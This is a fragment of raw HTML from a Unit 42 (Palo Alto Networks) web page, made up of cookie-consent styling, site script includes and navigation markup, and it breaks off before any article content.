.ot-chkbox,#onetrust-pc-sdk #ot-pc-lst .ot-vs-list .ot-vnd-item .ot-acc-hdr .ot-chkbox,#onetrust-pc-sdk .ot-accordion-layout.ot-checkbox-consent .ot-acc-hdr .ot-chkbox{position:relative;margin:0 .5rem}#onetrust-pc-sdk .ot-vs-config .ot-acc-hdr .ot-chkbox label,#onetrust-pc-sdk ul.ot-subgrps .ot-acc-hdr .ot-chkbox label,#onetrust-pc-sdk .ot-subgrp-cntr ul.ot-subgrps .ot-acc-hdr .ot-chkbox label,#onetrust-pc-sdk .ot-vs-list .ot-vnd-item .ot-acc-hdr .ot-chkbox label,#onetrust-pc-sdk .ot-vnd-serv .ot-vnd-item .ot-acc-hdr .ot-chkbox label,#onetrust-pc-sdk #ot-pc-lst .ot-vs-list .ot-vnd-item .ot-acc-hdr .ot-chkbox label,#onetrust-pc-sdk .ot-accordion-layout.ot-checkbox-consent .ot-acc-hdr .ot-chkbox label{padding:0}#onetrust-pc-sdk .ot-vs-config .ot-acc-hdr .ot-chkbox label::before,#onetrust-pc-sdk ul.ot-subgrps .ot-acc-hdr .ot-chkbox label::before,#onetrust-pc-sdk .ot-subgrp-cntr ul.ot-subgrps .ot-acc-hdr .ot-chkbox label::before,#onetrust-pc-sdk .ot-vs-list .ot-vnd-item .ot-acc-hdr .ot-chkbox label::before,#onetrust-pc-sdk .ot-vnd-serv .ot-vnd-item .ot-acc-hdr .ot-chkbox label::before,#onetrust-pc-sdk #ot-pc-lst .ot-vs-list .ot-vnd-item .ot-acc-hdr .ot-chkbox label::before,#onetrust-pc-sdk .ot-accordion-layout.ot-checkbox-consent .ot-acc-hdr .ot-chkbox label::before{position:relative}#onetrust-pc-sdk .ot-vs-config .ot-acc-hdr .ot-chkbox input,#onetrust-pc-sdk ul.ot-subgrps .ot-acc-hdr .ot-chkbox input,#onetrust-pc-sdk .ot-subgrp-cntr ul.ot-subgrps .ot-acc-hdr .ot-chkbox input,#onetrust-pc-sdk .ot-vs-list .ot-vnd-item .ot-acc-hdr .ot-chkbox input,#onetrust-pc-sdk .ot-vnd-serv .ot-vnd-item .ot-acc-hdr .ot-chkbox input,#onetrust-pc-sdk #ot-pc-lst .ot-vs-list .ot-vnd-item .ot-acc-hdr .ot-chkbox input,#onetrust-pc-sdk .ot-accordion-layout.ot-checkbox-consent .ot-acc-hdr .ot-chkbox input{position:absolute;cursor:pointer;width:100%;height:100%;opacity:0;margin:0;top:0;left:0;z-index:1}#onetrust-pc-sdk .ot-subgrp-cntr ul.ot-subgrps li.ot-subgrp .ot-acc-hdr h5.ot-cat-header,#onetrust-pc-sdk .ot-subgrp-cntr ul.ot-subgrps li.ot-subgrp .ot-acc-hdr h4.ot-cat-header{margin:0}#onetrust-pc-sdk .ot-vs-config .ot-subgrp-cntr ul.ot-subgrps li.ot-subgrp h5{top:0;line-height:20px}#onetrust-pc-sdk .ot-vs-list{display:flex;flex-direction:column;padding:0;margin:.5rem 4px}#onetrust-pc-sdk .ot-vs-selc-all{display:flex;padding:0;float:unset;align-items:center;justify-content:flex-start}#onetrust-pc-sdk .ot-vs-selc-all.ot-toggle-conf{justify-content:flex-end}#onetrust-pc-sdk .ot-vs-selc-all.ot-toggle-conf.ot-caret-conf .ot-sel-all-chkbox{margin-right:48px}#onetrust-pc-sdk .ot-vs-selc-all.ot-toggle-conf .ot-sel-all-chkbox{margin:0;padding:0;margin-right:14px;justify-content:flex-end}#onetrust-pc-sdk .ot-vs-selc-all.ot-toggle-conf #ot-selall-vencntr.ot-chkbox,#onetrust-pc-sdk .ot-vs-selc-all.ot-toggle-conf #ot-selall-vencntr.ot-tgl{display:inline-block;right:unset;width:auto;height:auto;float:none}#onetrust-pc-sdk .ot-vs-selc-all.ot-toggle-conf #ot-selall-vencntr label{width:45px;height:25px}#onetrust-pc-sdk .ot-vs-selc-all .ot-sel-all-chkbox{margin-right:11px;margin-left:.75rem;display:flex;align-items:center}#onetrust-pc-sdk .ot-vs-selc-all .sel-all-hdr{margin:0 1.25rem;font-size:.812em;line-height:normal;text-align:center;word-break:break-word;word-wrap:break-word}#onetrust-pc-sdk .ot-vnd-list-cnt #ot-selall-vencntr.ot-chkbox{float:unset;right:0}#onetrust-pc-sdk[dir=rtl] #ot-back-arw,#onetrust-pc-sdk[dir=rtl] input~.ot-acc-hdr .ot-arw{transform:rotate(180deg);-o-transform:rotate(180deg);-ms-transform:rotate(180deg);-webkit-transform:rotate(180deg)}#onetrust-pc-sdk[dir=rtl] input:checked~.ot-acc-hdr .ot-arw{transform:rotate(270deg);-o-transform:rotate(270deg);-ms-transform:rotate(270deg);-webkit-transform:rotate(270deg)}#onetrust-pc-sdk[dir=rtl] .ot-chkbox label::after{transform:rotate(45deg);-webkit-transform:rotate(45deg);-o-transform:rotate(45deg);-ms-transform:rotate(45deg);border-left:0;border-right:3px solid}#onetrust-pc-sdk[dir=rtl] .ot-search-cntr>svg{right:0}@media only screen and (max-width: 600px){#onetrust-pc-sdk.otPcCenter{left:0;min-width:100%;height:100%;top:0;border-radius:0}#onetrust-pc-sdk #ot-pc-content,#onetrust-pc-sdk.ot-ftr-stacked .ot-btn-container{margin:1px 3px 0 10px;padding-right:10px;width:calc(100% - 23px)}#onetrust-pc-sdk .ot-btn-container button{max-width:none;letter-spacing:.01em}#onetrust-pc-sdk #close-pc-btn-handler{top:10px;right:17px}#onetrust-pc-sdk p{font-size:.7em}#onetrust-pc-sdk #ot-pc-hdr{margin:10px 10px 0 5px;width:calc(100% - 15px)}#onetrust-pc-sdk .vendor-search-handler{font-size:1em}#onetrust-pc-sdk #ot-back-arw{margin-left:12px}#onetrust-pc-sdk #ot-lst-cnt{margin:0;padding:0 5px 0 10px;min-width:95%}#onetrust-pc-sdk .switch+p{max-width:80%}#onetrust-pc-sdk .ot-ftr-stacked button{width:100%}#onetrust-pc-sdk #ot-fltr-cnt{max-width:320px;width:90%;border-top-right-radius:0;border-bottom-right-radius:0;margin:0;margin-left:15px;left:auto;right:40px;top:85px}#onetrust-pc-sdk .ot-fltr-opt{margin-left:25px;margin-bottom:10px}#onetrust-pc-sdk .ot-pc-refuse-all-handler{margin-bottom:0}#onetrust-pc-sdk #ot-fltr-cnt{right:40px}}@media only screen and (max-width: 476px){#onetrust-pc-sdk .ot-fltr-cntr,#onetrust-pc-sdk #ot-fltr-cnt{right:10px}#onetrust-pc-sdk #ot-anchor{right:25px}#onetrust-pc-sdk button{width:100%}#onetrust-pc-sdk:not(.ot-addtl-vendors) #ot-pc-lst:not(.ot-enbl-chr) .ot-sel-all{padding-right:9px}#onetrust-pc-sdk:not(.ot-addtl-vendors) #ot-pc-lst:not(.ot-enbl-chr) .ot-tgl-cntr{right:0}}@media only screen and (max-width: 896px)and (max-height: 425px)and (orientation: landscape){#onetrust-pc-sdk.otPcCenter{left:0;top:0;min-width:100%;height:100%;border-radius:0}#onetrust-pc-sdk .ot-pc-header{height:auto;min-height:20px}#onetrust-pc-sdk .ot-pc-header .ot-pc-logo{max-height:30px}#onetrust-pc-sdk .ot-pc-footer{max-height:60px;overflow-y:auto}#onetrust-pc-sdk #ot-pc-content,#onetrust-pc-sdk #ot-pc-lst{bottom:70px}#onetrust-pc-sdk.ot-ftr-stacked #ot-pc-content{bottom:70px}#onetrust-pc-sdk #ot-anchor{left:initial;right:50px}#onetrust-pc-sdk #ot-lst-title{margin-top:12px}#onetrust-pc-sdk #ot-lst-title *{font-size:inherit}#onetrust-pc-sdk #ot-pc-hdr input{margin-right:0;padding-right:45px}#onetrust-pc-sdk .switch+p{max-width:85%}#onetrust-pc-sdk #ot-sel-blk{position:static}#onetrust-pc-sdk #ot-pc-lst{overflow:auto}#onetrust-pc-sdk #ot-lst-cnt{max-height:none;overflow:initial}#onetrust-pc-sdk #ot-lst-cnt.no-results{height:auto}#onetrust-pc-sdk input{font-size:1em !important}#onetrust-pc-sdk p{font-size:.6em}#onetrust-pc-sdk #ot-fltr-modal{width:100%;top:0}#onetrust-pc-sdk ul li p,#onetrust-pc-sdk .category-vendors-list-handler,#onetrust-pc-sdk .category-vendors-list-handler+a,#onetrust-pc-sdk .category-host-list-handler{font-size:.6em}#onetrust-pc-sdk.ot-shw-fltr #ot-anchor{display:none !important}#onetrust-pc-sdk.ot-shw-fltr #ot-pc-lst{height:100% !important;overflow:hidden;top:0px}#onetrust-pc-sdk.ot-shw-fltr #ot-fltr-cnt{margin:0;height:100%;max-height:none;padding:10px;top:0;width:calc(100% - 20px);position:absolute;right:0;left:0;max-width:none}#onetrust-pc-sdk.ot-shw-fltr .ot-fltr-scrlcnt{max-height:calc(100% - 65px)}}
            #onetrust-consent-sdk #onetrust-pc-sdk,
                #onetrust-consent-sdk #ot-search-cntr,
                #onetrust-consent-sdk #onetrust-pc-sdk .ot-switch.ot-toggle,
                #onetrust-consent-sdk #onetrust-pc-sdk ot-grp-hdr1 .checkbox,
                #onetrust-consent-sdk #onetrust-pc-sdk #ot-pc-title:after
                ,#onetrust-consent-sdk #onetrust-pc-sdk #ot-sel-blk,
                        #onetrust-consent-sdk #onetrust-pc-sdk #ot-fltr-cnt,
                        #onetrust-consent-sdk #onetrust-pc-sdk #ot-anchor {
                    background-color: #000000;
                }
               
            #onetrust-consent-sdk #onetrust-pc-sdk h3,
                #onetrust-consent-sdk #onetrust-pc-sdk h4,
                #onetrust-consent-sdk #onetrust-pc-sdk h5,
                #onetrust-consent-sdk #onetrust-pc-sdk h6,
                #onetrust-consent-sdk #onetrust-pc-sdk p,
                #onetrust-consent-sdk #onetrust-pc-sdk #ot-ven-lst .ot-ven-opts p,
                #onetrust-consent-sdk #onetrust-pc-sdk #ot-pc-desc,
                #onetrust-consent-sdk #onetrust-pc-sdk #ot-pc-title,
                #onetrust-consent-sdk #onetrust-pc-sdk .ot-li-title,
                #onetrust-consent-sdk #onetrust-pc-sdk .ot-sel-all-hdr span,
                #onetrust-consent-sdk #onetrust-pc-sdk #ot-host-lst .ot-host-info,
                #onetrust-consent-sdk #onetrust-pc-sdk #ot-fltr-modal #modal-header,
                #onetrust-consent-sdk #onetrust-pc-sdk .ot-checkbox label span,
                #onetrust-consent-sdk #onetrust-pc-sdk #ot-pc-lst #ot-sel-blk p,
                #onetrust-consent-sdk #onetrust-pc-sdk #ot-pc-lst #ot-lst-title h3,
                #onetrust-consent-sdk #onetrust-pc-sdk #ot-pc-lst .back-btn-handler p,
                #onetrust-consent-sdk #onetrust-pc-sdk #ot-pc-lst .ot-ven-name,
                #onetrust-consent-sdk #onetrust-pc-sdk #ot-pc-lst #ot-ven-lst .consent-category,
                #onetrust-consent-sdk #onetrust-pc-sdk .ot-leg-btn-container .ot-inactive-leg-btn,
                #onetrust-consent-sdk #onetrust-pc-sdk .ot-label-status,
                #onetrust-consent-sdk #onetrust-pc-sdk .ot-chkbox label span,
                #onetrust-consent-sdk #onetrust-pc-sdk #clear-filters-handler,
                #onetrust-consent-sdk #onetrust-pc-sdk .ot-optout-signal
                {
                    color: #FFFFFF;
                }
             #onetrust-consent-sdk #onetrust-pc-sdk .privacy-notice-link,
                    #onetrust-consent-sdk #onetrust-pc-sdk .ot-pgph-link,
                    #onetrust-consent-sdk #onetrust-pc-sdk .category-vendors-list-handler,
                    #onetrust-consent-sdk #onetrust-pc-sdk .category-vendors-list-handler + a,
                    #onetrust-consent-sdk #onetrust-pc-sdk .category-host-list-handler,
                    #onetrust-consent-sdk #onetrust-pc-sdk .ot-ven-link,
                    #onetrust-consent-sdk #onetrust-pc-sdk .ot-ven-legclaim-link,
                    #onetrust-consent-sdk #onetrust-pc-sdk #ot-host-lst .ot-host-name a,
                    #onetrust-consent-sdk #onetrust-pc-sdk #ot-host-lst .ot-acc-hdr .ot-host-expand,
                    #onetrust-consent-sdk #onetrust-pc-sdk #ot-host-lst .ot-host-info a,
                    #onetrust-consent-sdk #onetrust-pc-sdk #ot-pc-content #ot-pc-desc .ot-link-btn,
                    #onetrust-consent-sdk #onetrust-pc-sdk .ot-vnd-serv .ot-vnd-item .ot-vnd-info a,
                    #onetrust-consent-sdk #onetrust-pc-sdk #ot-lst-cnt .ot-vnd-info a
                    {
                        color: #00C0E8;
                    }
            #onetrust-consent-sdk #onetrust-pc-sdk .category-vendors-list-handler:hover { text-decoration: underline;}
            #onetrust-consent-sdk #onetrust-pc-sdk .ot-acc-grpcntr.ot-acc-txt,
            #onetrust-consent-sdk #onetrust-pc-sdk .ot-acc-txt .ot-subgrp-tgl .ot-switch.ot-toggle
             {
                background-color: #696969;
            }
             #onetrust-consent-sdk #onetrust-pc-sdk #ot-host-lst .ot-host-info,
                    #onetrust-consent-sdk #onetrust-pc-sdk .ot-acc-txt .ot-ven-dets
                            {
                                background-color: #696969;
                            }
        #onetrust-consent-sdk #onetrust-pc-sdk
            button:not(#clear-filters-handler):not(.ot-close-icon):not(#filter-btn-handler):not(.ot-remove-objection-handler):not(.ot-obj-leg-btn-handler):not([aria-expanded]):not(.ot-link-btn),
            #onetrust-consent-sdk #onetrust-pc-sdk .ot-leg-btn-container .ot-active-leg-btn {
                background-color: #00CC66;border-color: #00CC66;
                color: #000000;
            }
            #onetrust-consent-sdk #onetrust-pc-sdk .ot-active-menu {
                border-color: #00CC66;
            }
            
            #onetrust-consent-sdk #onetrust-pc-sdk .ot-leg-btn-container .ot-remove-objection-handler{
                background-color: transparent;
                border: 1px solid transparent;
            }
            #onetrust-consent-sdk #onetrust-pc-sdk .ot-leg-btn-container .ot-inactive-leg-btn {
                background-color: #FFFFFF;
                color: #78808E; border-color: #78808E;
            }
            #onetrust-consent-sdk #onetrust-pc-sdk .ot-tgl input:focus + .ot-switch, .ot-switch .ot-switch-nob, .ot-switch .ot-switch-nob:before,
            #onetrust-pc-sdk .ot-checkbox input[type="checkbox"]:focus + label::before,
            #onetrust-pc-sdk .ot-chkbox input[type="checkbox"]:focus + label::before {
                outline-color: #000000;
                outline-width: 1px;
            }
            #onetrust-pc-sdk .ot-host-item > button:focus, #onetrust-pc-sdk .ot-ven-item > button:focus {
                border: 1px solid #000000;
            }
            #onetrust-consent-sdk #onetrust-pc-sdk *:focus,
            #onetrust-consent-sdk #onetrust-pc-sdk .ot-vlst-cntr > a:focus {
               outline: 1px solid #000000;
            }#onetrust-pc-sdk .ot-vlst-cntr .ot-ext-lnk,  #onetrust-pc-sdk .ot-ven-hdr .ot-ext-lnk{
                    background-image: url('https://cdn.cookielaw.org/logos/static/ot_external_link.svg');
                }
            #onetrust-pc-sdk .ot-cat-grp .ot-accordion-layout .ot-always-active{
    color: #00CC66;
}
#onetrust-pc-sdk .ot-accordion-layout .ot-plus-minus span {
    background: #00CC66;
}
#onetrust-pc-sdk .ot-accordion-layout .ot-tgl input:checked+.ot-switch .ot-switch-nob:before{
    background-color: #029c4f;
    border-color: #029c4f;
}
#onetrust-pc-sdk .ot-accordion-layout .ot-tgl input:checked+.ot-switch .ot-switch-nob {
    background-color: #baefd5;
    border: 1px solid #029c4f;
}
div.ot-optout-signal > span{
color: #000000;
}.ot-sdk-cookie-policy{font-family:inherit;font-size:16px}.ot-sdk-cookie-policy.otRelFont{font-size:1rem}.ot-sdk-cookie-policy h3,.ot-sdk-cookie-policy h4,.ot-sdk-cookie-policy h6,.ot-sdk-cookie-policy p,.ot-sdk-cookie-policy li,.ot-sdk-cookie-policy a,.ot-sdk-cookie-policy th,.ot-sdk-cookie-policy #cookie-policy-description,.ot-sdk-cookie-policy .ot-sdk-cookie-policy-group,.ot-sdk-cookie-policy #cookie-policy-title{color:dimgray}.ot-sdk-cookie-policy #cookie-policy-description{margin-bottom:1em}.ot-sdk-cookie-policy h4{font-size:1.2em}.ot-sdk-cookie-policy h6{font-size:1em;margin-top:2em}.ot-sdk-cookie-policy th{min-width:75px}.ot-sdk-cookie-policy a,.ot-sdk-cookie-policy a:hover{background:#fff}.ot-sdk-cookie-policy thead{background-color:#f6f6f4;font-weight:bold}.ot-sdk-cookie-policy .ot-mobile-border{display:none}.ot-sdk-cookie-policy section{margin-bottom:2em}.ot-sdk-cookie-policy table{border-collapse:inherit}#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy{font-family:inherit;font-size:1rem}#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy h3,#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy h4,#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy h6,#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy p,#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy li,#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy a,#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy th,#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy #cookie-policy-description,#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy .ot-sdk-cookie-policy-group,#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy #cookie-policy-title{color:dimgray}#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy #cookie-policy-description{margin-bottom:1em}#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy .ot-sdk-subgroup{margin-left:1.5em}#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy #cookie-policy-description,#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy .ot-sdk-cookie-policy-group-desc,#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy .ot-table-header,#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy a,#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy span,#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy td{font-size:.9em}#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy td span,#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy td a{font-size:inherit}#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy .ot-sdk-cookie-policy-group{font-size:1em;margin-bottom:.6em}#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy .ot-sdk-cookie-policy-title{margin-bottom:1.2em}#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy>section{margin-bottom:1em}#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy th{min-width:75px}#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy a,#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy a:hover{background:#fff}#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy thead{background-color:#f6f6f4;font-weight:bold}#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy .ot-mobile-border{display:none}#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy section{margin-bottom:2em}#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy .ot-sdk-subgroup ul li{list-style:disc;margin-left:1.5em}#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy .ot-sdk-subgroup ul li h4{display:inline-block}#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy table{border-collapse:inherit;margin:auto;border:1px solid #d7d7d7;border-radius:5px;border-spacing:initial;width:100%;overflow:hidden}#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy table th,#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy table td{border-bottom:1px solid #d7d7d7;border-right:1px solid #d7d7d7}#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy table tr:last-child td{border-bottom:0px}#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy table tr th:last-child,#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy table tr td:last-child{border-right:0px}#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy table .ot-host,#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy table .ot-cookies-type{width:25%}.ot-sdk-cookie-policy[dir=rtl]{text-align:left}#ot-sdk-cookie-policy h3{font-size:1.5em}@media only screen and (max-width: 530px){.ot-sdk-cookie-policy:not(#ot-sdk-cookie-policy-v2) table,.ot-sdk-cookie-policy:not(#ot-sdk-cookie-policy-v2) thead,.ot-sdk-cookie-policy:not(#ot-sdk-cookie-policy-v2) tbody,.ot-sdk-cookie-policy:not(#ot-sdk-cookie-policy-v2) th,.ot-sdk-cookie-policy:not(#ot-sdk-cookie-policy-v2) td,.ot-sdk-cookie-policy:not(#ot-sdk-cookie-policy-v2) tr{display:block}.ot-sdk-cookie-policy:not(#ot-sdk-cookie-policy-v2) thead tr{position:absolute;top:-9999px;left:-9999px}.ot-sdk-cookie-policy:not(#ot-sdk-cookie-policy-v2) tr{margin:0 0 1em 0}.ot-sdk-cookie-policy:not(#ot-sdk-cookie-policy-v2) tr:nth-child(odd),.ot-sdk-cookie-policy:not(#ot-sdk-cookie-policy-v2) tr:nth-child(odd) a{background:#f6f6f4}.ot-sdk-cookie-policy:not(#ot-sdk-cookie-policy-v2) td{border:none;border-bottom:1px solid #eee;position:relative;padding-left:50%}.ot-sdk-cookie-policy:not(#ot-sdk-cookie-policy-v2) td:before{position:absolute;height:100%;left:6px;width:40%;padding-right:10px}.ot-sdk-cookie-policy:not(#ot-sdk-cookie-policy-v2) .ot-mobile-border{display:inline-block;background-color:#e4e4e4;position:absolute;height:100%;top:0;left:45%;width:2px}.ot-sdk-cookie-policy:not(#ot-sdk-cookie-policy-v2) td:before{content:attr(data-label);font-weight:bold}.ot-sdk-cookie-policy:not(#ot-sdk-cookie-policy-v2) li{word-break:break-word;word-wrap:break-word}#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy table{overflow:hidden}#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy table td{border:none;border-bottom:1px solid #d7d7d7}#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy table,#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy thead,#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy tbody,#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy th,#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy td,#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy tr{display:block}#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy table .ot-host,#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy table .ot-cookies-type{width:auto}#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy tr{margin:0 0 1em 0}#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy td:before{height:100%;width:40%;padding-right:10px}#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy td:before{content:attr(data-label);font-weight:bold}#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy li{word-break:break-word;word-wrap:break-word}#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy thead tr{position:absolute;top:-9999px;left:-9999px;z-index:-9999}#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy table tr:last-child td{border-bottom:1px solid #d7d7d7;border-right:0px}#ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy table tr:last-child td:last-child{border-bottom:0px}}
                
                    #ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy h5,
                    #ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy h6,
                    #ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy li,
                    #ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy p,
                    #ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy a,
                    #ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy span,
                    #ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy td,
                    #ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy #cookie-policy-description {
                        color: #696969;
                    }
                    #ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy th {
                        color: #FFFFFF;
                    }
                    #ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy .ot-sdk-cookie-policy-group {
                        color: #40A557;
                    }
                    
                    #ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy #cookie-policy-title {
                            color: #238A4D;
                        }
                    
            
                    #ot-sdk-cookie-policy-v2.ot-sdk-cookie-policy table th {
                            background-color: #000000;
                        }
                    
            .ot-floating-button__front{background-image:url('https://cdn.cookielaw.org/logos/static/ot_persistent_cookie_icon.png')}</style><script type="text/javascript" src="https://www.paloaltonetworks.com/etc.clientlibs/panClean/components/mainNavigationComp/clientlibs/panClean/criticalTopBase.min.js"></script><script type="text/javascript" src="https://www.paloaltonetworks.com/etc.clientlibs/panClean/components/mainNavigationComp/clientlibs/panClean/criticalTopProductNav.min.js"></script><script type="text/javascript" src="https://www.paloaltonetworks.com/etc.clientlibs/panClean/components/mainNavigationComp/clientlibs/panClean/defered.min.js"></script></head>
<body class="post-template-default single single-post postid-137319 single-format-standard no-sidebar win chrome desktop is-loaded is-ready">
<header class="haeder py-15 position-relative z-index-2" style="display: none;">
  <div class="container px-sm-30 px-35">
    <div class="row">
        <div class="first-logo col-sm-auto col-6 mb-sm-0 mb-40 text-sm-center order-1">
                        <a href="https://www.paloaltonetworks.com/">
                <img src="/wp-content/uploads/2021/07/PANW_Parent.png" width="140px" alt="Logo">
            </a>
        </div>
      <div class="col-sm-auto col-6 text-sm-center order-sm-2 order-4 second-logo-unit">
        <a href="https://unit42.paloaltonetworks.com/">
            <img src="https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/unit42-logo-white.svg" class="attachment-full size-full" alt="Unit42 Logo" width="150" height="35">
        </a>
      </div>

      <div class="col-auto d-sm-none ml-auto mb-40 order-2">
        <button class="btn__search" data-toggle="collapse" data-target="#search" aria-label="search"><i class="ui ui-1"></i></button>
      </div>

      <div id="search" class="collapse d-sm-block col-sm-auto col-12 ml-auto order-3">
        <div class="pt-sm-0 pt-20 pb-sm-0 pb-40 mt-sm-0 mt-n30">
                      <input type="search" placeholder="Search Unit 42" id="innerSearch" class="header__search" value="" required="" aria-label="Inner Search">
                  </div>
      </div>

      <div class="col-auto d-sm-none d-flex ml-auto align-items-center order-5">
        <button class="btn__menu rounded" data-toggle="collapse" data-target="#navigation">Menu</button>
      </div>
    </div>
  </div>
</header>

<nav id="navigation" class="site-nav collapse d-sm-block pb-20 mt-sm-10" style="display: none!important;">
  <div class="container px-sm-30">
    <ul id="menu-primary-navigation" class="main-menu d-sm-flex font-weight-medium"><li id="menu-item-97290" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-97290"><a href="https://unit42.paloaltonetworks.com/tools/">Tools</a></li>
<li id="menu-item-41" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-41"><a href="https://unit42.paloaltonetworks.com/atoms/">ATOMs</a></li>
<li id="menu-item-119884" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-119884"><a rel="noopener" href="https://www.paloaltonetworks.com/unit42">Security Consulting</a></li>
<li id="menu-item-81229" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-81229"><a href="https://unit42.paloaltonetworks.com/about-unit-42/">About Us</a></li>
<li id="menu-item-121229" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-121229"><a href="https://start.paloaltonetworks.com/contact-unit42.html"><b style="color:#C84727">Under Attack?</b></a></li>
</ul>  </div>
</nav>
<div class="panClean pan-template-home" id="main-nav-menu-cont">
    <div class="cleanHeader mainNavigationComp baseComponent parbase">
        <div class="productNav2021Component dark defaultRedesigned" id="PAN_2021_NAV_ASYNC" data-type="unit"><div class="base-component-spacer spacer-none  "></div>
<div class="product-2021-nav" data-type-of-nav="defaultRedesigned" role="navigation" aria-label="main">
  <button class="btn nav-open" aria-label="open mobile navigation"></button>
  <a class="mobile-header-logo" href="https://www.paloaltonetworks.com/unit42" aria-label="palo alto networks" nav-track="true" nav-track-breadcrumb="nav:unit:mobile:home"></a>
  <button class="btn mobile-search" aria-label="search"></button>
  <nav class="product-2021-nav-main" aria-label="product main">
    <div class="mobile-header" aria-label="mobile header">
      <button class="btn nav-close" nav-track="true" nav-track-breadcrumb="nav:unit:mobile:close nav" aria-label="close mobile navigation">
        <img width="24" height="24" src="https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/x-black.svg" alt="x close icon to close mobile navigation" nolozad="true">
      </button>
      <a href="https://www.paloaltonetworks.com/unit42" class="nav-logo" nav-track="true" nav-track-breadcrumb="nav:unit:mobile:logo" aria-label="paloaltonetworks">
        <img width="181" height="23" src="https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/unit42-logo-dark.svg" alt="unit42 logo" nolozad="true">
      </a>
      <button class="btn mobile-search" nav-track="true" nav-track-breadcrumb="nav:unit:mobile:search" aria-label="search">
        <img width="28" height="28" src="https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/search-black.svg" alt="magnifying glass search icon to open search field" nolozad="true">
      </button>
    </div>
    <div class="container-fluid">
      <ul class="nav-left" aria-label="left" role="menubar">
        <li class="link logo" role="menuitem">
          <a href="https://www.paloaltonetworks.com/unit42" nav-track="true" nav-track-breadcrumb="nav:unit:logo" aria-label="Palo Alto Networks"></a>
        </li>
        <li class="link " role="menuitem">
            <a href="https://www.paloaltonetworks.com/unit42/about" target="" nav-track="true" nav-track-breadcrumb="nav:unit:About Unit 42" aria-label="About Unit 42" rel="noopener">About Unit 42</a>
                </li>
        <li class=" " role="menuitem">
            <a href="#" id="nav_services" aria-haspopup="true" aria-expanded="false" nav-track="true" nav-track-breadcrumb="nav:unit:Services">Services</a>
                <div class="mega-dropdown-menu" aria-labelledby="nav_services" data-type="services">
                  <div class="base-component-spacer spacer-none  "></div>
<div class="mobile-inner-header" data-mobile-overview="Overview">
	<button class="btn btn-nav-back" aria-label="back to main navigation">
		<img width="20" height="20" src="https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/arrow-right-black.svg" nolozad="true" alt="black arrow pointing left to go back to main navigation">
	</button>
	<span class="title">Services</span>
</div>

<div class="col col-list no-border col-list-first ">
		<div class="content">
